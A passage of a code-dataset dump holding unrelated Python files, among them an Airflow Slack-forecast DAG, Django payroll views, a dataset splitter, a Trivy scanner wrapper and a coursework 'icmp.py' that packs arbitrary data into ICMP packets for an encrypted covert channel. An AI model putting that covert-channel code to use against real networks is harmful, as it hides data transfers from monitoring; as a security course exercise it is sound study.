'__main__':\n run()\n","repo_name":"dstrohmaier/contrafactives_grid_world","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26514184748","text":"import os\nimport requests\n\nfrom airflow import DAG\nfrom airflow.contrib.operators.slack_webhook_operator import SlackWebhookOperator\n\nfrom datetime import datetime\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2023, 3, 1),\n 'retries': 0,\n}\n# https://api.slack.com/messaging/webhooks\n# https://towardsdatascience.com/integrating-docker-airflow-with-slack-to-get-daily-reporting-c462e7c8828a#:~:text=The%20Slack%20Webhook%20Operator%20can,some%20trigger%20condition%20is%20met.\nAPI = \"https://api.open-meteo.com/v1/forecast?latitude=19.43&longitude=-99.13&hourly=temperature_2m\"\n\n\ndef get_daily_forecast() -> str:\n forecast = requests.get(API).json()['hourly']['temperature_2m'][7]\n time = requests.get(API).json()['hourly']['time'][7].split('T')[1]\n return f'La predicción de la temperatura en la Ciudad de México a las {time} es de: {forecast} °C'\n\nwith DAG(\n dag_id='prueba_slack_webhook',\n default_args=default_args,\n start_date = datetime(2023, 3, 1),\n schedule='@daily',\n catchup=False,\n) as dag:\n post_daily_forecast = SlackWebhookOperator(\n task_id='post_daily_forecast',\n http_conn_id='slack_connection',\n message=get_daily_forecast()\n )\n","repo_name":"beduExpert/Airflow-Fundamentals","sub_path":"Sesion-06/Ejemplo-02/assets/dags/s06_e02_webhook_slack.py","file_name":"s06_e02_webhook_slack.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37419638435","text":"from rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.decorators import api_view, permission_classes\nfrom .models import Employee\nfrom .models import Paycheck\nfrom .serializers import PaycheckSerializer\nfrom django.shortcuts import get_object_or_404\n\n\n#@api_view(['GET'])\n#@permission_classes([IsAuthenticated])\n#def paycheck_home(request, fk):\n #paycheck = get_object_or_404(Paycheck, fk=fk)\n #serializer = PaycheckSerializer(paycheck)\n #return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef paycheck_display(request, pk):\n paycheck = get_object_or_404(Paycheck, pk=pk)\n serializer = PaycheckSerializer(paycheck)\n return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get__all_paychecks_for_employee(request, employee_id):\n paychecks = Paycheck.objects.filter(employee_id=employee_id)\n if request.method == 'GET':\n serializer = PaycheckSerializer(paychecks, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\n@permission_classes([IsAdminUser])\ndef create_paycheck(request):\n if request.method == 'POST':\n serializer = PaycheckSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n@api_view(['PUT', 'DELETE'])\n@permission_classes([IsAdminUser])\ndef edit_delete_paycheck(request, pk):\n paycheck = get_object_or_404(Paycheck, pk=pk)\n if request.method == 'PUT':\n serializer = PaycheckSerializer(paycheck, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n paycheck.delete()\n return Response(status = status.HTTP_204_NO_CONTENT)","repo_name":"alexanderjtaylor/workforce_services","sub_path":"backend/paychecks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5306722399","text":"#Inspiration taken from https://github.com/ValentinBELYN/icmplib/blob/454e4c37617e2ea892b2e07df024c3c401d4b29b/icmplib/sockets.py#L125\nfrom struct import pack, unpack\nimport socket\nfrom sys import platform\n\nPLATFORM_LINUX = platform == 'linux'\nPLATFORM_MACOS = platform == 'darwin'\nPLATFORM_WINDOWS = platform == 'win32'\n\nICMP_HEADER_CODE = 47\nICMP_CODE = socket.getprotobyname('icmp')\nICMP_MAX_PAYLOAD_SIZE = 65507\n\n_ICMP_HEADER_OFFSET = 20\n_ICMP_HEADER_REAL_OFFSET = 20\n\n_ICMP_CHECKSUM_OFFSET = _ICMP_HEADER_OFFSET + 2\n_ICMP_PAYLOAD_OFFSET = _ICMP_HEADER_OFFSET + 8\n\n_ICMP_ECHO_REPLY = 0\n\ndef calc_checksum(data):\n sum = 0\n data += b'\\x00'\n\n for i in range(0, len(data) - 1, 2):\n sum += (data[i] << 8) + data[i + 1]\n sum = (sum & 0xffff) + (sum >> 16)\n\n sum = ~sum & 0xffff\n\n return sum\n\ndef create_packet(id, sequence, data: bytes):\n checksum = 0\n header = pack('!2B3H', ICMP_CODE, ICMP_HEADER_CODE, checksum, id, sequence)\n checksum = calc_checksum(header + data)\n header = pack('!2B3H', ICMP_CODE, ICMP_HEADER_CODE, checksum, id, sequence)\n return header + data\n\ndef send(s: socket.socket, dest_addr, data):\n for i in range(int(((len(data)/ICMP_MAX_PAYLOAD_SIZE)+0.5)) + 1):\n packet = create_packet(\n id=1,\n sequence=i,\n data=data)\n s.sendto(packet, (dest_addr, 0))\n\ndef receive(s: socket.socket) -> tuple():\n packet, addr = s.recvfrom(1024)\n if PLATFORM_LINUX:\n packet = b'\\x00' * _ICMP_HEADER_OFFSET + packet\n\n if len(packet) < _ICMP_CHECKSUM_OFFSET:\n return None\n\n type, code = unpack('!2B', packet[\n _ICMP_HEADER_OFFSET:\n _ICMP_CHECKSUM_OFFSET])\n\n if type != _ICMP_ECHO_REPLY:\n packet = packet[\n _ICMP_PAYLOAD_OFFSET\n - _ICMP_HEADER_OFFSET\n + _ICMP_HEADER_REAL_OFFSET:]\n\n if len(packet) < _ICMP_PAYLOAD_OFFSET:\n return None\n return (packet, addr)","repo_name":"mlRosenquist/au-syssec-e21-grp8-assignments","sub_path":"assignment-2/encrypted-covert-channel/icmp.py","file_name":"icmp.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36416604589","text":"\nfrom flask_script import Manager, Server, Shell\nfrom flask_migrate import Migrate, MigrateCommand\nfrom app import create_app, db\nfrom app.models import User, Role, Subscriber, BlogPost, Category, Comment\n\n# Creating app instance\napp = create_app('default')\n# app = create_app('test')\n# app = create_app('production')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\nmanager.add_command('db', MigrateCommand)\nmanager.add_command('server', Server)\n\n\n@manager.shell\ndef make_shell_context():\n return dict(app=app, db=db, User=User, Role=Role, Subscriber=Subscriber, BlogPost=BlogPost, Category=Category, Comment=Comment)\n\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"sami-mai/Mai-Blog","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26954744964","text":"def search(str_to_find, main_txt):\n pattern_found = 0\n\n for i in range(len(main_txt) - len(str_to_find) + 1):\n if txt[i:i + len(str_to_find)] == str_to_find:\n print(\"\\nPattern Found at Index\", i)\n print(\"\\t\" + txt[:i] + \"\\033[93m\" + \"\\033[1m\" + txt[i:i + len(str_to_find)] + \"\\033[0m\" + txt[i + len(str_to_find):])\n pattern_found += 1\n\n else:\n if pattern_found == 0:\n print(\"\\nPattern not Found\")\n\n\nif __name__ == '__main__':\n\n txt = input(\"Enter the main text : \")\n str_2_find = input(\"Enter the string you want to find : \")\n\n print('\\nYou want to find \"{str}\" from \"{text}\" !'.format(str=str_2_find, text=txt))\n\n search(str_2_find, txt)\n","repo_name":"mhpanchal/Mini-Projcects","sub_path":"String Matching/str_match.py","file_name":"str_match.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71122645211","text":"import os, glob, shutil, sys\nfrom concurrent.futures import ThreadPoolExecutor\n\nimages_directory = input(\"Images directory: \")\nlabels_directory = input(\"Labels directory: \")\noutput_directory = input(\"Output directory: \")\ntrain_percentage = 0.7\ntest_percentage = 0.2\nvalid_percentage = 0.1\n\nif not os.path.exists(images_directory):\n print(\"Images directory does not exist!\")\n sys.exit()\nif not os.path.exists(labels_directory):\n print(\"Labels directory does not exist!\")\n sys.exit()\nif not os.path.exists(os.path.join(output_directory)):\n os.mkdir(os.path.join(output_directory))\n\nimages = glob.glob(os.path.normpath(os.path.join(images_directory, \"*.jpg\")))\ncount = len(images)\n\ndef collect(iterList):\n labeled_images = []\n while len(iterList) > 0:\n image_file = iterList.pop(0)\n text_file = os.path.normpath(os.path.join(labels_directory, \".\".join([os.path.splitext(os.path.basename(image_file))[0], \"txt\"])))\n if os.path.exists(text_file):\n labeled_images.append({\n \"image\": image_file,\n \"text\": text_file\n })\n else:\n print(f\"'{text_file}' not found\")\n return labeled_images\n\ndef split(iterList, *percentages):\n countList = []\n for percentage in percentages:\n count = round(len(iterList)*percentage)\n countList.append(count)\n split_result = []\n for index in range(len(countList)):\n piece = []\n while countList[index] > 0:\n piece.append(iterList.pop(0))\n countList[index] -= 1\n split_result.append(piece)\n return split_result\n\nimages = collect(images)\nprint(\"-\"*30)\nprint(f\"original total images: {len(images)}\")\ntrain, test, valid = split(images, train_percentage, test_percentage, valid_percentage)\nprint(\"-\"*30)\nprint(f\"train ({train_percentage*100}%): {len(train)}\")\nprint(f\"test ({test_percentage*100}%): {len(test)}\")\nprint(f\"valid ({valid_percentage*100}%): {len(valid)}\")\nprint(f\"total (100%): {len(train)+len(test)+len(valid)}\")\nprint(\"-\"*30)\n\ndef copyTo(iterList, dir_name):\n total = 0\n if not os.path.exists(os.path.join(output_directory, dir_name)):\n os.mkdir(os.path.join(output_directory, dir_name))\n os.mkdir(os.path.join(output_directory, dir_name, \"images\"))\n os.mkdir(os.path.join(output_directory, dir_name, \"labels\"))\n if not os.path.exists(os.path.join(output_directory, dir_name)):\n os.mkdir(os.path.join(output_directory, dir_name))\n if not os.path.exists(os.path.join(output_directory, dir_name, \"images\")):\n os.mkdir(os.path.join(output_directory, dir_name, \"images\"))\n if not os.path.exists(os.path.join(output_directory, dir_name, \"labels\")):\n os.mkdir(os.path.join(output_directory, dir_name, \"labels\"))\n while len(iterList) > 0:\n labeled_image = iterList.pop()\n basename_image = os.path.basename(labeled_image[\"image\"])\n basename_text = os.path.basename(labeled_image[\"text\"])\n dest_image = os.path.normpath(os.path.join(output_directory, dir_name, \"images\", basename_image))\n dest_text = os.path.normpath(os.path.join(output_directory, dir_name, \"labels\", basename_text))\n shutil.copy2(labeled_image[\"image\"], dest_image)\n shutil.copy2(labeled_image[\"text\"], dest_text)\n print(f\"{labeled_image} done.\")\n total += 1\n return total\n\nexecutor = ThreadPoolExecutor(max_workers=3)\nfuture1 = executor.submit(copyTo, train, \"train\")\nfuture2 = executor.submit(copyTo, test, \"test\")\nfuture3 = executor.submit(copyTo, valid, \"valid\")\ntotal = future1.result()+future2.result()+future3.result()","repo_name":"zEuS0390/python-based-yolo-dataset-tools","sub_path":"train_test_split_dataset.py","file_name":"train_test_split_dataset.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26280523280","text":"\"\"\"Doorman\"\"\"\n\n# doorman\n\nmax_diff = int(input())\nline = list(input()[::-1])\n\ncounts = {\"W\": 0, \"M\": 0}\nwaiting = None\n\nwhile line:\n next_one = line.pop()\n if abs(counts[\"W\"] - counts[\"M\"]) == max_diff:\n counts[next_one] += 1\n if abs(counts[\"W\"] - counts[\"M\"]) > max_diff:\n counts[next_one] -= 1\n if waiting is not None:\n break\n waiting = next_one\n else:\n if waiting is not None:\n line.append(waiting)\n waiting = None\n else:\n counts[next_one] += 1\n\nprint(sum(counts.values()))\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"D/doorman.py","file_name":"doorman.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12284706142","text":"from django.urls import path\nfrom .views import (\n NoteBookListView,\n NoteBookDetailView,\n NoteListView,\n NoteDetailView,\n TagListView,\n)\n\n\nurlpatterns = [\n path(\"notebooks/\", NoteBookListView.as_view(), name=\"notebook_list_url\"),\n path(\"notebook//\", NoteBookDetailView.as_view(), name=\"notebook_detail_url\"),\n path(\"notebook//notes/\", NoteListView.as_view(), name=\"note_list_url\"),\n path(\"note/\", NoteDetailView.as_view(), name=\"note_detail_url\"),\n path(\"tag/\", TagListView.as_view(), name=\"tag_list_url\"),\n]\n","repo_name":"w44121/rest_notebook","sub_path":"src/notebook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73533651930","text":"from cv2 import VideoCapture, destroyAllWindows, CAP_V4L2, flip, FILLED, circle, imshow\nimport numpy as np\nfrom autopy import screen, mouse as Amouse\nfrom services import handTrackingModule as htm\nimport os\nfrom datetime import datetime, timedelta\nimport sys\n\nclass Mouse:\n\n def __init__(self):\n self.cap = VideoCapture(0)\n self.wScr, self.hScr = screen.size()\n self.wCam = 640\n self.hCam = 480\n self.frameR = 150\n self.smootheing = 5\n self.plocX = 0\n self.plocY = 0\n self.clocX = 0\n self.clocY = 0\n self.detector = htm.HandDetector()\n\n def Mouse(self, img):\n \n # finding hands\n self.detector.findhands(img)\n lmlist, bbox = self.detector.findPosition(img)\n\n # 2. get the tip of index and midel finger\n if len(lmlist) != 0:\n Xindex, Yindex = lmlist[8][1], lmlist[8][2]\n Xmidel, Ymidel = lmlist[12][1], lmlist[12][2]\n # 3. check which one is up?\n fingers = self.detector.fingersUp()\n # 4. index: moving mode\n if fingers[1] == 1 and fingers[2] == 0:\n # 5. cordinates the position (cam :640*480) to (screen :2560 × 1600)\n xMOUSE = np.interp(Xindex, [self.frameR, self.wCam - self.frameR], [0, self.wScr])\n yMOUSE = np.interp(Yindex, (self.frameR, self.hCam - self.frameR), (0, self.hScr))\n \n # 6. smoothen value\n self.clocX = self.plocX + (xMOUSE - self.plocX) / self.smootheing\n self.clocY = self.plocY + (yMOUSE - self.plocY) / self.smootheing\n # 7. move mouse\n Amouse.move(self.clocX, self.clocY)\n\n circle(img, (Xindex, Yindex), 15, (20, 180, 90), FILLED)\n self.plocY, self.plocX = self.clocY, self.clocX\n # 8. both are up : cliking mode\n if fingers[1] == 1 and fingers[2] == 1:\n # 9. finding distance\n length, bbox = self.detector.findDistance(8, 12, img)\n # 10. click if distance was short\n if length < 40:\n Amouse.click()\n return img\n\n\n def main(self):\n if self.cap.isOpened():\n self.cap.set(3, self.wCam)\n self.cap.set(4, self.hCam)\n while True:\n sucess, img = self.cap.read()\n img = flip(img, 1)\n img = self.Mouse(img)\n else:\n return \"Pas de cam\"\n\n def stop(self):\n self.cap.release()\n self.cap = None\n destroyAllWindows()\n\n def __del__(self):\n print(\"vm killed\")\n \n","repo_name":"gravity-zero/Mirori_FR","sub_path":"identification/services/virtualmouse.py","file_name":"virtualmouse.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70973938010","text":"import json\nimport tempfile\nfrom subprocess import PIPE, Popen\nfrom typing import Optional\n\nfrom hoppr_cyclonedx_models.cyclonedx_1_4 import (\n CyclonedxSoftwareBillOfMaterialsStandard as Bom_1_4,\n)\nfrom hoppr_cyclonedx_models.cyclonedx_1_4 import Vulnerability, Tool\nfrom packageurl import PackageURL\n\nfrom security_commons.common.utils import (\n build_bom_from_purls,\n)\nfrom security_commons.common.vulnerability_scanner import VulnerabilitySuper\n\n\nclass TrivyScanner(VulnerabilitySuper):\n \"\"\" \"Interacts with the trivy cli to scan an sbom\"\"\"\n\n required_tools_on_path = [\"trivy\"]\n supported_types = [\"npm\", \"maven\", \"pypi\", \"gem\", \"golang\", \"nuget\", \"connan\"]\n\n def get_vulnerabilities_by_purl(\n self, purls: list[PackageURL]\n ) -> dict[str, Optional[list[Vulnerability]]]:\n \"\"\"Get the vulnerabilities for a list of package URLS (purls)\n This function will return a dictionary of package URL to vulnerabilities or none if no vulnerabilities are found\n \"\"\"\n results = {}\n for purl in purls:\n results[purl.to_string()] = []\n\n purls = list(filter(lambda x: x.type in self.supported_types, purls))\n if len(purls) > 0:\n bom = build_bom_from_purls(purls)\n\n with tempfile.NamedTemporaryFile(mode=\"w\") as bom_file:\n bom_file.write(bom.json())\n\n with Popen(\n [\"trivy\", \"sbom\", \"--format\", \"cyclonedx\", str(bom_file.name)],\n stdout=PIPE,\n stdin=PIPE,\n stderr=PIPE,\n ) as process:\n stdout_data = process.communicate(input=b\"\")[0]\n bom_file.close()\n bom_dict = json.loads(stdout_data)\n bom_dict[\"metadata\"][\"component\"][\"type\"] = \"application\"\n bom_dict[\"metadata\"][\"component\"][\"name\"] = \"generated\"\n trivy_result = Bom_1_4(**bom_dict)\n\n for vuln in trivy_result.vulnerabilities:\n for affects in vuln.affects:\n _, _, purl = str(affects.ref).partition(\"#\")\n affects.ref.__root__ = purl.strip(\"'\")\n if vuln.ratings is not None:\n results[str(affects.ref.__root__)].append(vuln)\n vuln.tools = [Tool(vendor=\"Aquasec\", name=\"Trivy\")]\n\n return results\n","repo_name":"ep-infosec/27_lmco_hoppr-cop","sub_path":"hopprcop/trivy/trivy_scanner.py","file_name":"trivy_scanner.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11571979881","text":"\"\"\"treatment usage\n\nRevision ID: 123a8fca2610\nRevises: 3fdf9062540d\nCreate Date: 2021-12-28 21:45:08.918586\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '123a8fca2610'\ndown_revision = '3fdf9062540d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('treatment_usage',\n sa.Column('id', sa.BigInteger(), autoincrement=True, nullable=False),\n sa.Column('created_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('updated_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('patient_id', sa.BigInteger(), nullable=True),\n sa.Column('type', sa.String(255), nullable=False),\n sa.Column('reference_id', sa.Integer(), nullable=False),\n sa.Column('state', sa.Enum('open', 'close', name='state'), nullable=True),\n sa.Column('created_user_id', sa.BigInteger(), nullable=False),\n sa.Column('updated_user_id', sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(['created_user_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['patient_id'], ['patient.id'], ),\n sa.ForeignKeyConstraint(['updated_user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_treatment_usage_id'), 'treatment_usage', ['id'], unique=False)\n op.create_table('treatment_usage_item',\n sa.Column('id', sa.BigInteger(), autoincrement=True, nullable=False),\n sa.Column('created_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('updated_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('treatment_usage_id', sa.BigInteger(), nullable=True),\n sa.Column('pharmacy_item_id', sa.BigInteger(), nullable=True),\n sa.Column('inventory_id', sa.Integer(), nullable=True),\n sa.Column('quantity', sa.Integer(), nullable=True),\n sa.Column('unit', sa.String(255), nullable=True),\n sa.Column('created_user_id', sa.BigInteger(), nullable=False),\n sa.Column('updated_user_id', sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(['created_user_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['pharmacy_item_id'], ['pharmacy_item.id'], ),\n sa.ForeignKeyConstraint(['treatment_usage_id'], ['treatment_usage.id'], ),\n sa.ForeignKeyConstraint(['updated_user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_treatment_usage_item_id'), 'treatment_usage_item', ['id'], unique=False)\n \n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n \n op.drop_index(op.f('ix_treatment_usage_item_id'), table_name='treatment_usage_item')\n op.drop_table('treatment_usage_item')\n op.drop_index(op.f('ix_treatment_usage_id'), table_name='treatment_usage')\n op.drop_table('treatment_usage')\n # ### end Alembic commands ###\n","repo_name":"yeaung276/oner-herp","sub_path":"oner-python/src/alembic/versions/123a8fca2610_treatment_usage.py","file_name":"123a8fca2610_treatment_usage.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8536876998","text":"def Create_Shuffule_List():\n node = nuke.selectedNode()\n channels = node.channels()\n layers = list( set([c.split('.')[0] for c in channels]) )\n for layer in layers:\n shuffleNode = nuke.nodes.Shuffle( label=layer, inputs=[node] )\n shuffleNode['in'].setValue( layer )\n shuffleNode['postage_stamp'].setValue( True )\n\nnuke.menu( 'Nodes' ).addCommand( 'Other/FileOpen01', \"Create_Shuffule_List()\", 'shift+n')\n\n\n","repo_name":"shr2197/Nuke_Extract_Shuffle_Passes","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18888747507","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: LZH\n统计由Inventor导出的二维图纸量\n\"\"\"\n\n# =================\n# imports\n# =================\nimport os\nimport time\n\nimport win32com.client\n\nimport AutoPath_TypeConvert as Tc\n\n\n# =========================================================\ndef getfilefame(path):\n dwg_list = []\n for root, dirs, files in os.walk(path):\n for i in files:\n if os.path.splitext(i)[1] == '.dwg':\n j = os.path.join(root, i)\n dwg_list.append(j)\n return dwg_list\n\n\ndef change_name(f_list, wincad):\n list_amount = 0\n drawing_amount = 0\n drawing_amount0_list = []\n for i in f_list:\n list_amount += 1\n print(\"第%d张,共%d张\" % (list_amount, len(f_list)))\n name, number = None, None\n time.sleep(1)\n wincad.Documents.Open(i)\n doc = wincad.ActiveDocument\n time.sleep(0.5)\n # try:\n # doc.SelectionSets.Item(\"SS1\").Delete()\n # except:\n # pass\n # slt = doc.SelectionSets.Add(\"SS1\")\n # slt.Select(5) # 全选\n # obj = slt[0]\n # obj.move(Tc.vtpnt(0, 0), Tc.vtpnt(0, 0))\n # slt.Delete()\n\n try:\n doc.SelectionSets.Item(\"SS2\").Delete()\n except:\n pass\n slt = doc.SelectionSets.Add(\"SS2\")\n filterType = [0] # 定义过滤类型\n filterData = [\"INSERT\"] # 设置过滤参数\n filterType = Tc.vtint(filterType)\n filterData = Tc.vtvariant(filterData)\n slt.Select(5, 0, 0, filterType, filterData) # 实现过滤\n time.sleep(0.5)\n for entity in slt:\n if entity.Name == '标题栏 标题栏':\n attributes = entity.GetAttributes()\n for attri in attributes:\n if attri.TagString == '零件代号':\n if attri.TextString == '':\n break\n elif attri.TextString[0] == '\\\\':\n name = attri.TextString.split(';', 1)[1]\n else:\n name = attri.TextString\n if attri.TagString == '库存编号':\n if attri.TextString == '':\n break\n elif attri.TextString[0] == '\\\\':\n number = attri.TextString.split(';', 1)[1]\n else:\n number = attri.TextString\n break\n slt.Delete()\n doc.Close()\n if name and number:\n file_name_old = i\n file_name_new = os.path.split(i)[0] + '\\\\' + number + ' ' + name + '.dwg'\n os.rename(file_name_old, file_name_new)\n else:\n drawing_amount0_list.append(i)\n print(\"\\n以下%d张图纸未重命名,请手动进行:\" % len(drawing_amount0_list))\n for each in drawing_amount0_list:\n print(each, end=',\\n')\n\n\nif __name__ == '__main__':\n path = input(\"请输入要重命名的文件夹路径(默认包含所有子文件夹):\")\n # path = 'r\"' + path + '\"'\n f_list = getfilefame(path)\n print(\"共找到%d个dwg文件\" % len(f_list))\n\n wincad = win32com.client.Dispatch(\"AutoCAD.Application\")\n change_name(f_list, wincad)\n input()\n","repo_name":"Blacky-cn/pyCAD","sub_path":"Change_Name/Change_Name.py","file_name":"Change_Name.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39668317112","text":"\"\"\"\nPlane class, support chain function calls.\n\"\"\"\n\nfrom plane.func import PATTERNS, compile_regex\nfrom plane.pattern import ASCII_WORD, Token\nfrom plane.punctuation import punc\n\n\nclass Plane:\n \"\"\"\n Init :class:`Plane.text` and :class:`Plane.values` when the instance is\n created.\n \"\"\"\n\n def __init__(self):\n self._text = \"\"\n self._values = []\n\n @property\n def text(self):\n return self._text\n\n @property\n def values(self):\n return self._values\n\n def extract(self, regex, result=False):\n \"\"\"\n :param Regex regex: :class:`Regex`\n :param bool result: if `True`, return result directly\n\n Extract tokens, results is saved in :class:`Plane.values`\n \"\"\"\n regex = PATTERNS.get(regex.name, compile_regex(regex))\n values = []\n for mo in regex.finditer(self._text):\n name = mo.lastgroup\n value = mo.group(name)\n values.append(Token(name, value, mo.start(), mo.end()))\n\n if result:\n return values\n self._values.extend(values)\n return self\n\n def replace(self, regex, repl=None, result=False):\n \"\"\"\n :param Regex regex: :class:`Regex`\n :param str repl: replacement for regex, if setted, default value will \\\n be overwritten\n :param bool result: if `True`, return result directly\n\n Replace matched :class:`regex` patterns with :class:`repl`.\n \"\"\"\n repl = repl if repl is not None else regex.repl\n text, start = \"\", 0\n\n for t in self.extract(regex, result=True):\n text += self._text[start : t.start] + repl\n start = t.end\n text += self._text[start:]\n\n if result:\n return text\n self._text = text\n return self\n\n def update(self, text):\n \"\"\"\n :param str text: text string.\n\n Init `Plane.text` and `Plane.values`.\n \"\"\"\n if not isinstance(text, str):\n raise TypeError(\"Only support string.\")\n\n self._text = text\n self._values = []\n return self\n\n def segment(self, regex=ASCII_WORD):\n \"\"\"\n :param Regex regex: default regex is `ASCII_WORD`, this will keep all \\\n english words complete\n\n Segment sentence.\n Chinese words will be split into char and English words will be keeped.\n \"\"\"\n regex = PATTERNS.get(regex.name, compile_regex(regex))\n result, start = [], 0\n for t in regex.finditer(self._text):\n result.extend(\n [char for char in list(self._text[start : t.start()]) if char != \" \"]\n )\n result.append(self._text[t.start() : t.end()])\n start = t.end()\n result.extend([char for char in list(self._text[start:]) if char != \" \"])\n return result\n\n def remove_punctuation(self, repl=\" \", punc=punc):\n \"\"\"\n :param str repl: replacement for regex, if setted, default value will \\\n be overwritten\n\n remove all punctuations\n \"\"\"\n self._text = punc.remove(self._text, repl)\n return self\n\n def normalize_punctuation(self, punc=punc):\n \"\"\"\n normalize punctuations to English punctuations\n \"\"\"\n self._text = punc.normalize(self.text)\n return self\n","repo_name":"kemingy/Plane","sub_path":"plane/plane.py","file_name":"plane.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"73188259930","text":"import time\nfrom ccapi import EventHandler, SessionOptions, SessionConfigs, Session, Subscription, Event\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\n\nif __name__ == \"__main__\":\n option = SessionOptions()\n config = SessionConfigs()\n session = Session(option, config)\n exchange = \"okx\"\n instrument = \"BTC-USDT\"\n subscription = Subscription(exchange, instrument, \"MARKET_DEPTH\", \"MARKET_DEPTH_MAX=400&CONFLATE_INTERVAL_MILLISECONDS=100\")\n session.subscribe(subscription)\n fig, ax = plt.subplots()\n startTime = time.time()\n while True:\n bids = {\"price\": [], \"size\": []}\n asks = {\"price\": [], \"size\": []}\n eventList = session.getEventQueue().purge()\n if eventList:\n event = eventList[-1]\n if event.getType() == Event.Type_SUBSCRIPTION_DATA:\n for message in event.getMessageList():\n for element in message.getElementList():\n elementNameValueMap = element.getNameValueMap()\n for name, value in elementNameValueMap.items():\n if name == \"BID_PRICE\":\n bids[\"price\"].append(float(value))\n if name == \"BID_SIZE\":\n bids[\"size\"].append(float(value))\n if name == \"ASK_PRICE\":\n asks[\"price\"].append(float(value))\n if name == \"ASK_SIZE\":\n asks[\"size\"].append(float(value))\n ax.clear()\n ax.set_title(f\"{instrument} Order Book On {exchange.title()} at {message.getTimeISO()}\")\n ax.set_xlabel(\"Price\")\n ax.set_ylabel(\"Amount\")\n sns.ecdfplot(\n x=\"price\",\n weights=\"size\",\n legend=False,\n stat=\"count\",\n complementary=True,\n data={\"price\": bids[\"price\"], \"size\": bids[\"size\"]},\n ax=ax,\n color=\"g\",\n )\n sns.ecdfplot(x=\"price\", weights=\"size\", legend=False, stat=\"count\", data={\"price\": asks[\"price\"], \"size\": asks[\"size\"]}, ax=ax, color=\"r\")\n plt.pause(0.1)\n if time.time() - startTime > 10:\n break\n session.stop()\n print(\"Bye\")\n","repo_name":"crypto-chassis/ccapi","sub_path":"binding/python/example/data_visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":465,"dataset":"github-code","pt":"32"} +{"seq_id":"29801138698","text":"def countSlice(sensorSet, slice):\n sensor = sensorSet[\"sensor\"]\n beacon = sensorSet[\"beacon\"]\n sensorRange = abs(sensor[0] - beacon[0]) + abs(sensor[1] - beacon[1])\n if ((sensor[1] - sensorRange) <= slice <= (sensor[1] + sensorRange)):\n yoffset = abs(sensor[1] - slice)\n xrange = sensorRange - 